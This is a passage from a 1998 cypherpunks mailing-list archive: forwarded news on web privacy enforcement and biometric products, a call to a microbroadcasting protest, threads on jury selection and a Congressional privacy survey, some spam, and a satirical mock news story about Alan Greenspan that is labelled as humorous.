stated Internet privacy goals. But Ms. LaMotta added that she was certain
that businesses could accomplish the task on their own. "It's our
experience that, when you tap them on the shoulder, change happens. They
say: 'Oh, gosh. OK."' 

With just a few minutes' effort, most anyone can find a Web site that
collects personal information from visitors, in registration or order
forms, without disclosing how that information will be used. But how those
sites respond when asked about this can differ markedly. 

A site called Soccer Patch (www.soccerpatch.com) is a trading post for
soccer-playing children who want to trade team patches. It lists the names,
e-mail addresses and in some cases the hometowns of children who want to
trade patches. That is a red flag for F.T.C. enforcers. They worry that
child molesters can use the information to find victims.  

As soon as a reporter asked Philip Rubin, president of Edge of Chaos, the
company that manages the site, about this, he immediately promised to
change the policy. And a few days later, he did. 

"We now require all contributors to provide us with signed permission
letters before e-mail addresses/and or names can be posted," he said.
"Contributors under the age of 18 must provide a form signed by their
parents or guardians." And the Soccer Patch site posted the form so that it
can be printed out and mailed. 

Rosenthal Honda, a Washington area car dealer, had a different approach. 

The company, like many car dealers, posts a pre-qualification form for auto
loans, requesting a variety of personal information, including income, debt
load and the amount of rent or mortgage payments. Nowhere on the site does
the company say how that information will be used. And when asked about
that, the company issued a statement saying, "We will look at the issue
with our Web developer." 

Asked two weeks later what had come of this, Rosenthal Honda did not respond. 

F.T.C. officials say they are investigating other Web sites and will almost
certainly file charges against other companies, as the agency did with
Geocities. 

 Dean Forbes, 31, an F.T.C. lawyer,  found the Geocities problem and spends
most of his time working on  Internet privacy issues. 

 "Generally we get ideas from reading the trade press," he said, as well as
from "looking at who is linking up
with list brokers; we get tips from interest groups, usenet news group
postings -- and complaints." 

Forbes, for one, disagrees with the idea that a Web site can escape trouble
if it simply decides not to post a privacy policy. "If you don't make a
visible statement," he said, "that does not mean there isn't an implied
claim." 

But while his agency and the rest of the government figure out whether to
push for new rules on Web privacy, Forbes sees a bit of improvement on the
Web. 

"I'm not saying everything's great," he said. "But there is movement." 

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 24 Sep 1998 02:29:36 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Biometric Security Showcased at Int'l Conference
Message-ID: <199809240731.AAA25685@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Biometric Security Showcased at Int'l Conference
Date: Wed, 23 Sep 1998 08:28:26 -0500
To: believer@telepath.com

Source:  PR Newswire
http://www.prnewswire.com

SAFLINK and Unisys to Showcase Biometric Security Solutions for Banking at
World Wide Users Conference 

TAMPA, Fla., Sept. 22 /PRNewswire/ -- SAFLINK Corporation (Nasdaq: NRID), a
leader in the implementation of biometric technology in the financial
industry, will be participating in Unisys Corporation's second annual FBA
Navigator Users Conference, October 4 - 7 in Puerto Rico.The conference
provides an opportunity for users, and prospective users, of Unisys FBA
Navigator retail delivery suite to discuss trends and issues in the banking
industry, learn about Unisys product plans, provide feedback to Unisys, and
meet with peer users from around the world.

Targeted at bank marketing and delivery channel executives, and at senior
technical professionals, the conference theme is "Multiple Channels One
Solution."Presentations and interactive business sessions focus on one of
the most critical issues facing bankers today: how to maintain a
consistently high level of customer service while securely delivering
products and services through a variety of channels.Among the delivery
channels the conference will address are the branch, the call center, the
Internet and mobile banking.

Conference highlights include:

-An on-site tour of Westernbank, a Unisys FBA Navigator client and a
SAFLINK finger imaging client.The tour will highlight the recently
installed Unisys retail branch solution, which includes finger imaging
hardware and software from SAFLINK.Attendees will also receive a private
demonstration of the solution and will have an opportunity to address
questions to Westernbank, Unisys and Unisys business partners, including
SAFLINK, Microsoft Corporation and Genesys Corporation, during a panel
discussion following the site visit.

-A keynote address by Dr. James B. Moore, Ph. D., President and CEO of
highly respected Mentis Corporation, a leading financial services research
firm.Mentis recently published a research report on biometric technology
entitled 'Beyond the PIN: Evolving Strategies and Implementations of
Biometrics-Based Recognition for Financial Services,' which included an
overview of SAFLINK's kiosk installation at Purdue Employees Federal Credit
Union.(Further information about Mentis is available through the company's
web site at http://www.mentis.com.)

-A thought-provoking slate of business and technical sessions designed to
address the benefits of a multi-channel strategy, and to highlight various
implementation considerations and approaches.

-A dinner in Mayaguez, sponsored by Unisys, SAFLINK, Microsoft and Genesys,
with a special "Welcome to Puerto Rico" address by Frank C. Stipes,
President of Westernbank.

SAFLINK, a Unisys Marketing Associate business partner, has worked with
Unisys to seamlessly integrate biometric technology with the highly
regarded Unisys FBA Navigator retail delivery solution.Capabilities
developed with Unisys include customer identification, and
teller/supervisor log-on and transaction approvals."Our partners add key
capabilities to the FBA Navigator solution, to the ultimate benefit of our
customers" said Judy Jones, Unisys FBA Navigator Program Director."We are
very excited about our partnership with SAFLINK, which enables us to offer
our retail delivery clients leading-edge biometric authentication."

Westernbank is the first Unisys customer to install the integrated FBA
Navigator/SAFLINK solution."We cannot say enough good things about how well
this partnership has worked" said Israel Lorenzana, Unisys Account
Executive, for Westernbank Puerto Rico."SAFLINK's expertise in integrating
biometrics, along with the outstanding support from their technical staff,
helped the development and integration effort move quickly.Their
willingness to participate in every aspect of the project, including areas
such as user training and helping the bank develop informative customer
brochures, also contributed to the success of this installation.They are
key players in the Westernbank/Unisys team."

About SAFLINK

SAFLINK Corporation, a National Registry Inc. subsidiary based in Tampa,
Florida, brings the Power of Biometric Identificationa to enterprise
networks and the Internet.The Company provides cost-effective
multi-biometric software solutions to verify individual identity, to
protect business and personal information, and to replace passwords and
PINs in order to safeguard and simplify access to electronic systems and
enable new online services for customers.The Company's Secure
Authentication Facility (SAF(TM)) suite of multi-biometric network security
products delivers enterprise-level secure access control to a range of
software platforms and network applications, including Microsoft(R) Windows
NT(R) and Internet Information Server(R). Further information is available
through the Company's World Wide Web Site (http://www.saflink.com).

About Unisys

Unisys is an information technology solutions provider that has a portfolio
of information services, technologies and third-party alliances needed to
help clients capitalize on their information asset to enhance their
competitiveness and responsiveness to customers. 

Unisys expertise is founded on the strengths of three global businesses:
Information Services, providing consulting, application solutions, systems
integration and outsourcing; Computer Systems, providing industry-leading
technologies; and Global CustomerServices, delivering comprehensive
services and products supporting distributed computing environments. Access
the Unisys home page on the World Wide Web --
http://www.unisys.com -- for further information.

SOURCE SAFLINK Corporation
Web Site: http://www.mentis.com

(c)1998 PR Newswire.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 24 Sep 1998 02:29:30 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Biometric Signature for "Forms w/o Paper"
Message-ID: <199809240731.AAA25696@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Biometric Signature for "Forms w/o Paper"
Date: Wed, 23 Sep 1998 08:32:25 -0500
To: believer@telepath.com

Source:  PR Newswire
http://www.prnewswire.com

Doxis, Inc. Announces Forms Without Paper Version 2.1 Computerized
Data/Document Input And Storage System 

New Release Lets Pharmaceutical Workers Input Process and Analytical
Forms/Data Into Secure Document Databases, With Improved Document Authoring
Features and Capabilities. Communicates With Key Enterprise Systems.

                  Visit Doxis at WorldPharm '98 Booth #1033

    NORWOOD, MA Sept. 22 /PRNewswire/ -- Lewis Bell, President and Chief
Executive Officer of Doxis, Inc., Norwood, MA, a pioneer and leader in the
development of mobile computer-based forms management software systems,
announced today, at WorldPharm '98, the latest version of Forms Without
Paper(TM) -- Version 2.1.

    Doxis developed and markets Forms Without Paper -- the first software
package that allows mobile pharmaceutical workers to input critical,
real-time batch process, research and analytical forms and data -- with
biometric signatures -- directly and interactively into a secure document
database.  The original data is locked into the form, the electronic
equivalent of the original paper copy.  However, data can also be made
available to enterprise databases without retranscription, and without
altering the original form. Forms Without Paper is a client server software
toolset that provides data for trend analysis, and can be customized to
interface to standards compliant MES (Manufacturing Execution Systems),
LIMS (Laboratory Information Management Systems), and ERP (Enterprise
Resource Planning) systems.

    Lewis Bell, Doxis, Inc., President and CEO, said, "Forms Without Paper
Version 2.1 features a more advanced and flexible document authoring
architecture designed to better facilitate and speed the process of
changing and revalidating forms.  This is a major breakthrough in
computerized data/document input and storage, and provides tremendous
advantages to pharmaceutical manufacturers who wish to use electronic
records." 

    Forms Without Paper Version 2.1 provides a superior vehicle for the
collection of handwritten forms and data by mobile workers.  It bridges
gaps between the capture of handwritten, signed documents and data
collection in highly regulated industries such as pharmaceutical and HBA
manufacturing. These industries now have the ability to automate the
capture of these documents and data at the point of work.  They can also
share it over
worldwide enterprise systems, with their document management systems, and
with other systems, including MES and LIMS. 

    According to Bell, using Forms Without Paper Version 2.1,
pharmaceutical companies now have a way to computerize both their existing
paper-based batch records and laboratory data sheets that is based upon
their current paradigm, and, therefore, is intuitive, non-disruptive to
their operations, and painless to implement by industry standards.

    The software enforces version control and increased accuracy of data
collection.  It automatically verifies data integrity and applied
tolerances per field.  It proactively enforces compliance with SOP's, and
provides a
patented audit trail for changes.  The orms Without Paper client runs on a
pen-based terminal operating under Windows 95(R)/98(R) -- the equivalent of
an electronic clipboard.  The hand held unit communicates with the server
via wireless LAN.  The new release will be available in the first quarter
of 1999 to pharmaceutical and consumer product manufacturers subject to FDA
regulation.

    Bell is quick to point out that the new system does not obsolete
existing forms processes, but rather automates them, making them more
efficient and secure, and less error prone.  "Many companies do not want to
reinvent the wheel when it comes to processing the forms they use
throughout their operations," Bell states.  "However, they do want a better
way to ensure the accuracy and timeliness of their forms.  They want to
control their forms throughout their life cycles, as the valuable corporate
assets they are."

    Using Forms Without Paper, a worker now enters the data onto the
electronic clipboard using a pen, just as he or she would when using a
paper form.  The layout of the form is the same as the paper version, and
workers can also print out the paper form if they need to.

    As it is collected, information is date and time stamped, operator
identified, and secured within the intelligent form to provide a cGMP
compliant audit trail that will include all information captured in
association with the data.  Digital signatures that are captured are
non-excisable, and can also be verified to authenticate the entry, if
desired. Completed forms are stored in a Secure Document Database.

    Once transferred to the user's network, information is available to
backend ODBC databases, desktop applications, and ODMA standards compliant
document management software.  Forms Without Paper can also be used as a
front end to enterprise packages such as SAP(R) and BPCS(R), allowing
pharmaceutical
companies to extend the reach of these applications to mobile workers. 

    Training on the system is available, as well as consultation and
professional services, including validation services.  Distribution,
product support, consultation and professional services will be handled
through the
Doxis direct sales channel. 

    Forms Without Paper(TM) and Doxis are registered trademarks of Doxis,
Inc. All other companies and products mentioned are trademarks of their
respective companies.

SOURCE Doxis, Inc.

(c)1998 PR Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 24 Sep 1998 02:29:34 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Fwd: SHOWDOWN AT THE FCC (Microbroadcasting)
Message-ID: <199809240731.AAA25707@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Bridget973@aol.com
Subject: IP: Fwd: SHOWDOWN AT THE FCC (Microbroadcasting)
Date: Wed, 23 Sep 1998 21:50:00 EDT
To: ignition-point@majordomo.pobox.com

Date:         Tue, 22 Sep 1998 23:42:07 -0400 (EDT)
From:        Sara Zia-Ebrahimi <sazF95@hamp.hampshire.edu>
To:            chatski@gl.umbc.edu

please forward to anyone you know who would be interested

UPDATE!!!!

SHOWDOWN AT THE FCC!!!

FREE RADIO ACTIVISTS MARCH ON WASHINGTON TO CONFRONT THE GLOBAL MEDIA
MONOPOLY AND THEIR MARIONNETTES IN GOVERNMENT!

Sunday October 4th and Monday October 5th

Calling all media activists, radio pirates, people for a democratic media
and people just fed up with crappy corporate radio:

Come to DC for the first national mobilization for free radio.
Microbroadcasters from around the country will gather for two days to
share radio skills, organize alliances, speak out to the media and protest
at the FCC and NAB buildings, culminating in a live broadcast straight
into the offices of the people working so hard to shut us down. Free Radio
Berkeley, Radio Mutiny, Steal This Radio and other microstations have all
broadcasted live in public and challenged the FCC to shut them down in the
light of day, in front of the press and the Feds have never dared to show
their face- this time, we're going to take it right to their doorstep and
tell them that if they're so sure that their dumb law is worth enforcing,
then the Chairman should come down from the 8th floor and put the cuffs on
us himself. There will also be workshops to help new folks start stations,
appointments will be made to lobby congress people, and press events will
be held to show the true, diverse face of the microbroadcasting movement.



Schedule

Sunday, 
Latin American Youth Center: @1419 Columbia Rd. NW DC
10am-12pm:
*Everything you need to start a community station besides a transmitter:
facilitated     by Joan and Eli of Free Radio Memphis 
*The FCC petitions: What's in it for us?: facilitated by Benn Kobb, Stuart
Poritzky and    Bill Spry  
*The current legal situation: facilitated by Alan Korn of the Committee
for Democratic  Communications, Scott Bullock from the Institute for
Justice
12-1 lunch
1-3pm:
*Transmitters 101: facilitated by Bill Gorz
*Starting a legal application to position for another First Amendment 
                 case: facilitated by Pete triDish and Alan Korn
*The threat of media concentration to democracy: facilitated by Greg
Ruggiero from Steal this Radio
3-5 pm:
*Transmitters 202: facilitated by 
*Commercial vs. non-commercial micro-stations: facilitated by Alan Korn
*Publicity: Tips on talking to the press and lobbying for support:  Jesse
Walker of the Competitive Enterprise Institute and Diane Imelda Fleming  

5-6:30 dinner  @La Casa 3166 Mt. Pleasant St. NW DC
7pm party/puppet making for demonstration @La Casa

Monday 
9 am Panel and Debate at the Freedom Forum: an event which will probably
be broadcast on NPR featuring micro-broadcasters, lawyers and FCC offcials
head-to-head




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Sep 1998 06:37:26 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Jury duty considered harmful, or at least rare
In-Reply-To: <19980924015428.2767.qmail@hades.rpini.com>
Message-ID: <v0401175ab22f88bb739c@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:54 PM -0400 on 9/23/98, Anonymous wrote:

> That is almost enough to make the more paranoid among us think that maybe
> they have a "do not summon" list.

What Fun! Just today, I got a summons for jury duty...

Is there a "do not summon" list? Synchronistic minds want to know.

Frankly, I wonder if most people who vote aren't just moving all the time.
I've lived in the same place 11 years, and my Jury summons comes every
three years, just like clockwork.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Wed, 23 Sep 1998 20:47:04 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Jury duty considered harmful, or at least rare
Message-ID: <19980924015428.2767.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 23 Sep 1998, Tim May wrote:

> 
> At 11:11 PM -0700 9/22/98, Bill Stewart wrote:
> 
> >Yeah.  The times I've known the facts in cop-vs-citizen cases,
> >the cops have often been lying; I have to assume that they're often lying
> >in cases when I don't know the facts as well.  Of course, getting
> >somebody with that kind of attitude about cops onto a jury
> >is somewhat unlikely, but occasionally you'll find neutrals.
> 
> I last served on a jury in 1973, 25 years ago, no doubt before many readers
> of Cypherpunks were born.
> 
> And I've only received a single _possible_ summons since, in the 25 years
> since that  one jury appearance.
> 
> Yet some of the apolitical numbskulls I know about have served on several
> juries in the same time. The Poisson, as expected, or something more human?
> 
> Jury nullifying minds want to know.

That is almost enough to make the more paranoid among us think that maybe
they have a "do not summon" list. They basically have this anyway with the
prosecution vetoing possible jurors. If you're on it, you just aren't
summoned. People on that list would be people of libertarian mindsets,
politically outspoken people, Cypherpunks, professional people, etc.

If they do have a list, I'd kind of like to be on it. I'm a college
student, and I _can't_ serve on a jury for more than a day or so. The same
goes for doctors, corporate executives, and others.

There is an inherent flaw in the jury system. You get summoned and are
legally required to blow the entire day down at the courthouse. If you're
a student you miss classes, and if you have a job you miss that too. You
have to pay for transportation, parking, food, and whatever else you need. 
In return, you get paid something like $3, which often isn't even enough
to cover the parking and get told every five minutes that this or that
will get you, as a juror or potential juror, thrown in jail.

Meanwhile, if you're a doctor, scientist, college student, lawyer, or hold
any other professional position you're thrown off most of the time. If you
have a decent job or if you're in school, forget about it, because if
you're tied up for more than a day or so you _just can't do it_. They
don't want people who know that juries are capable of nullification. They
don't want people who can determine that the evidence of one side or the
other is suspect. They don't want people who will actually look at the
facts rather than the emotion of the opening and closing arguments. The
prosecution sure as hell doesn't want anybody who will look at whether a
law should exist in the first place.

"Hey, Doctor! Um, I have to serve on a jury. Can you take all my patients
for the next six months while I'm locked in a hotel room? Oh, and I need
to still get my full salary to pay my bills. Thanks, buddy." Um, no.

So you basically wind up with juries which are stacked with welfare
recipients, stupid people, and retirees. A jury of retirees may work, but
the others surely don't.

When the trial actually starts, the average juror, regardless of what
council may tell them about due process, is usually biased in favor of the
prosecution, especially if the government is claiming that the defendant
is an evil child molestor. If it's a case involving technology, you get a
bunch of bogus "experts" up there which say what council wants to be said,
because real "experts" refuse to dumb down their testimony to a
kindergarden level.

"Mr. May, will you please explain -- in layman's terms -- exactly how the
microchip fabrication process works?"

"Well, we start with..." 

"I'm sorry to stop you, sir. Can you please explain to the jury -- in
layman's terms -- what a transistor is?" 

"Well, in this context it often acts as a switch for an electronic
circuit, but it can also--"

"Would you please explain in layman's terms what a circuit is?" 

Argh. 

Can you imagine trying to be a defense expert in a cryptography case with
a bunch of jurors who can barely read, are unemployed, hate "nerds," and
beat the "geeks" up in high school, while the prosecution is constantly
screaming that the defendant is a kiddy porn trader and you're expected to
dumb your expert testimony down to kindergarden level? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 24 Sep 1998 07:15:21 +0800
To: tesla@einstein.ssz.com (Experimental Instrumentation)
Subject: Smoke a spammers phone bill...try it, it's their quarter
Message-ID: <199809241244.HAA14249@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: mmanning68@hotmail.com
> Date: Thu, 24 Sep 1998 02:30:55 -0700 (PDT)
> Subject: Did you receive my last message?

> It is finally here...............
> Your own bulk friendly ISP!
> And we are giving them away for FREE!

> **************************************************
> To proof it, we are willing to give you, your
> own e-mail account for the next 30 days for FREE!
> See yourself - The earning potential is enormous!
> ***************************************************

> so please mention access 474- E for this
> special offer. Call today! 1.800.600.0343 ext 2669
> and we will give you all the details. Enjoy!


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gina.lombartti@usa.net
Date: Thu, 24 Sep 1998 13:05:55 +0800
To: <cypherpunks@Algebra.COM>
Subject: Hello from Hamburg,
Message-ID: <199809241801.NAA20389@galaxy.galstar.com>
MIME-Version: 1.0
Content-Type: text/plain



The Matchmaker,
   Agenzia di Matrimonio
      Biuro Matrymonialne
         Die Partnersuche   
   
I'm Gina from Milano, Italia and I help Singles from all over the world who 
are seeking for someone SPECIAL, a Romance,
a new Friendship or Relationship.
Just simply send me an e-mail and tell me little about yourself.

Regards,
Gina Lo'mbartti

Ginna Agenzia di Matrimonio
Via Galvani 12
20124 Milano
Italia
gina.lombartti@usa.net
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Formosa (? the Platypus)" <dformosa@zeta.org.au>
Date: Wed, 23 Sep 1998 08:03:56 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199809230415.GAA08863@replay.com>
Message-ID: <Pine.LNX.3.96.980924090232.338A-100000@mcloon>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 23 Sep 1998, Anonymous wrote:

[...]

> In my religion, saying unprovable things in public
> is a stonable offense.

I bet that makes peaple talking about program termination happy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 24 Sep 1998 21:30:24 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: No Privacy for Privacy Hypocrites
In-Reply-To: <v0401174ab22f0d6c7517@[139.167.130.246]>
Message-ID: <3.0.5.32.19980924090519.00b4c730@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Sounds like a great idea, in the "Asking for truth from power" category.
I doubt you'll get a lot of responses, but good luck.

>     The group, named "No Privacy for Privacy Hypocrites," (on
>the web at http://www.noprivacy.org) intends to make Congress
>confront the privacy concerns that are raised by the
>investigation, by asking Members of Congress to declare their own
>standards regarding privacy, and deal with the consequences.
...
>     On Monday, September 28, 1998, the group will distribute a
>survey to Members of Congress asking:
>
>     Do you believe any branch of government should investigate
>     allegations that elected officials have committed adultery,
>     including allegations that they have lied about it?
>
>     If a Member answers yes or if the Member refuses to answer
>the first question, then (and only then) they will be asked:
>
>     Have you ever committed adultery, and have you ever lied
>     about it?

Of course, if the Member answers "No", then the obvious followon is
	"So what are you trying to hide?"  :-)
but that's really best left for the version of the survey for
appointed officials asking if they think appointed officials 
should be investigated.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 24 Sep 1998 21:40:46 +0800
To: cypherpunks@toad.com
Subject: Re: sex, lies, and videotape
In-Reply-To: <199809230415.GAA08895@replay.com>
Message-ID: <3.0.5.32.19980924091028.00b4c730@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:15 AM 9/23/98 +0200, Count of Monte Carlo wrote:
>What the fuck, the TLAs leveraged their POTUS bugs for
>years...

There's been some suggestion that the Filegate files
included a lot of Republicans in compromising positions,
which is keeping some of them better behaved than
they might otherwise be (even if they don't know if
the files include them, they may still be worried.)
It's not clear if this includes the picture
of Orrin Hatch that's rumoured to be floating around Salt Lake.

>The only regret is that Frank Zappa was not alive
>to put it all to music.

It's all a bunch of bogus pomp anyway :-)


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 24 Sep 1998 11:46:42 +0800
To: Cypherpunks@cyberpass.net
Subject: Additional drive/stego/tempest/customs NOIZE
Message-ID: <360A77DD.575E@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Sir,

Sunder Wrote:
> You seem to think these guys are actually super spies, not clueless
> overpaid (for their level of skills) bored burrowcrats working on an
> assembly line.  You're over estimating their abilities by at least
> four orders of magnitude there.
>
Through the *magic* of taxation and government contracts the opponents
you are so casually dismissing as dull-witted drones are your peers. So
unless you really are smarter than everyone else I would say that your
above statement is rash.

If the motivation to snoop is strong enough the resources will be put
into place by the current crop of ground-dwelling representatives and
any imaginable technology could be applied to the *problem*. I doubt in
this case, at this time, that the motivation is enough to pay for a
database of EMI analyses of PC bootups.

Mike

I found this one interesting: http://www.jya.com/fbi-en7898.htm
Our elected representatives probably believe this official-looking
analysis more than they do mere citizen's opinions.

I have LOTS of copper materials. I have a source for conductive paints.
Could you suggest a good source for ferrites in powder and tile form?

All this to insure my privacy whilst I compute in my own house! The
snoopers have, by their very existence, a chilling effect on speech.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 24 Sep 1998 09:59:11 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Jury duty considered harmful, or at least rare
In-Reply-To: <v0313030fb22e4de0bcd6@[209.133.20.24]>
Message-ID: <v04011700b2300baeca3f@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:12 PM -0500 9/23/98, James A. Donald wrote:
>
>To rig a jury by excluding undesirables such as Tim May would
>be far too laborious.  To rig a jury it would be necessary to

	No, no, On the contrary, far too easy.

	There are certain people who are NEVER called to jury duty, people
convicted of felonies & etc. simply put the name of an undesirable on this
list, don't release it as a _list_ of "criminals", and no one will
complain. After all, who complains about _not_ being called?

	Then, as you screen jurors who have recieved summons, you simply
add the most extreme to the list. Others aren't a problem because they show
up, and are dismissed.

	It's hard to do all at once, but they have all the time in the world.

>include only desirables, thus the pool from which the jury is
>selected would be vastly smaller than the official pool, and
>simple statistics would show this up.

	If anyone were to look.

	Security thru obscurity works until someone looks at it. If no one
thinks to look tho...
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Thu, 24 Sep 1998 10:31:11 +0800
To: Petro <petro@playboy.com>
Subject: Re: Jury duty considered harmful, or at least rare
In-Reply-To: <v0313030fb22e4de0bcd6@[209.133.20.24]>
Message-ID: <360A650D.9F535A71@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Petro wrote:


>         There are certain people who are NEVER called to jury duty, people
> convicted of felonies & etc. simply put the name of an undesirable on this
> list, don't release it as a _list_ of "criminals", and no one will
> complain. After all, who complains about _not_ being called?

Why the FUCK not, it is supposed to be a jurry of your PEERS.  If you've
already been convicted of a felony, a fellow felon is your peer.  

:^) 

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infopeace.com>
Date: Thu, 24 Sep 1998 14:03:41 +0800
To: cypherpunks@cyberpass.net
Subject: Greenspan Farts, Market Tumbles
Message-ID: <v03130301b22fe63eeeb9@[209.75.197.30]>
MIME-Version: 1.0
Content-Type: text/plain




Greenspan Farts, Market Tumbles

  NEW YORK (AP) -- American stock markets nose-dived today immediately
  after a press conference at the Federal Reserve Bank, when Alan
  Greenspan, Fed Chairman, passed gas in an audible expulsion of
  flatulence. Investors, spooked by the ominous noise, panicked.

  The Dow Jones industrial average lost 364 points in 20 minutes.
  Luckily for investors, the Fed Chief then uttered vague,
  ambiguous statements which could be interpreted as hints of an
  upcoming rate cut by the masses of illiterate investors. The
  market soared up more than 450 points, restoring confidence in a
  bullish market even in the face of the sensational Asian crisis.

  A key banking player from Merrill Lynch & Co., speaking on
  condition of anonymity, said, "That really stank. Greenspan must
  have eaten beans for breakfast." Other bankers at the press
  conference expressed similar misgivings about Greenspan breaking
  wind. "It sincerely disturbs me that this man's accidental
  passing of gas affects market performance in such a substantive
  way," said another banker. "Doesn't anyone believe that market
  behavior depends on more than this single man's intestinal fortitude?"

  Representatives at the Federal Reserve issued only a single
  statement, saying "Greenspan is in good spirits, and seems to be
  amused that majorities of investors give his flatulance this
  power. He is in good health, and his intestinal disturbance
  passed." The Dow index gained 90 points within 2 minutes of the
  release of the Fed statement.

  George Soros, billionaire hedge fund manager and global money
  market speculator, said regarding Greenspan's noxious vapors,
  "I don't give a damn what Alan ate for breakfast. This entire
  spectacle is ridiculous. If you or I farted, as everyone does,
  probably no one would notice. But for some insane, perhaps inane
  reason, nearly every American and many foreign investors dote on
  Greenspan's every comment and action, interpreting them as signs
  of apocalypse or a wealthy paradise, depending on their mood."

  In this exclusive report, a senior Fed official, speaking on
  condition of anonymity, said, "Perhaps I'm the only one in the
  world who sees rate cuts as a psychological panacea. A truly
  stable, substantive economy takes more than a slightly lower
  interest rate in an already flawed system of debt mechanics.
  We need to restructure the economy on solid grounds with long-
  term growth goals. The economy must not be structured only to
  increase the short-term profits of investors who are only
  interested in the bottom-line monetary numbers, but who do not
  care about the real effects their money has in our world."

  Fed officials declined further comment on the incident. Some
  financial analysts believe Greenspan's foul air is a clear
  sign the Fed will decide to cut interest rates at next week's
  strategy meeting.

-----------------------
NOTE: In accordance with Title 17 U.S.D. section 107, this erroneous and
humorous material is distributed without profit or payment to those who
